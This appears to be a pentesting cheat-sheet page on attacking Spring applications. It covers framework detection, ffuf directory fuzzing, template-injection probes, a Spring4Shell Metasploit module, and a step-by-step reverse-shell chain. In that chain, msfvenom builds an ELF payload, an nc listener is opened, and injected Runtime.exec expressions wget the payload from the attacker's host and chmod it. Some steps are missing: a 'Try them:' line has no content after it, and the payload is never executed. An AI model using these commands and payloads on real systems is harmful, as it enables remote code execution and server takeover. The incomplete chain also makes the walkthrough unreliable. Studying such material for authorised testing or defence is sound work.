Spring Pentesting

Last modified: 2023-09-15

Reverse Shell SSTI Web

Spring is an application framework and inversion of control container for the Java platform.

Framework Detection

If we get the Whitelabel Error Page, the website may use Spring Boot.


Directory Discovery

ffuf -u https://example.com/FUZZ -w seclists/Discovery/Web-Content/spring-boot.txt



If there is an input form, such as a search form, or URL parameter which the parameter is reflected in the website, you may be able to find the vulnerability to the server-side template injection.

Try them:


Then you can also check more about that.

{"dfd".replace("d", "x")}
#{"dfd".replace("d", "x")}
*{"dfd".replace("d", "x")}

// ---------------------------------------

// the desired output of the above...

Reverse Shell

First generate the payload of the reverse shell which will be downloaded from the website.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f elf > r.elf

Start a local web server to allow the website to download the payload named “r.elf”

python3 -m http.server 8000

In another terminal, open listener for getting the reverse shell.

nc -lvnp <local-port>

In the target website,

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("wget http://<local-ip>:8000/r.elf")}

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("chmod 777 ./r.elf")}


Finally we should see to get the shell.

Spring4Shell (CVE-2022-22965)

Spring4Shell is a vulnerabilitiy to remote code execution in Spring framework. It affects a component in Spring Core which is the heart of the framework.
It is identified as a bypass of the patch for CVE-2010-1622.


We can use Metasploit for this exploitation.

msf> use exploit/multi/http/spring_framework_rce_spring4shell

Alternatively, various PoCs are available in GitHub repositories.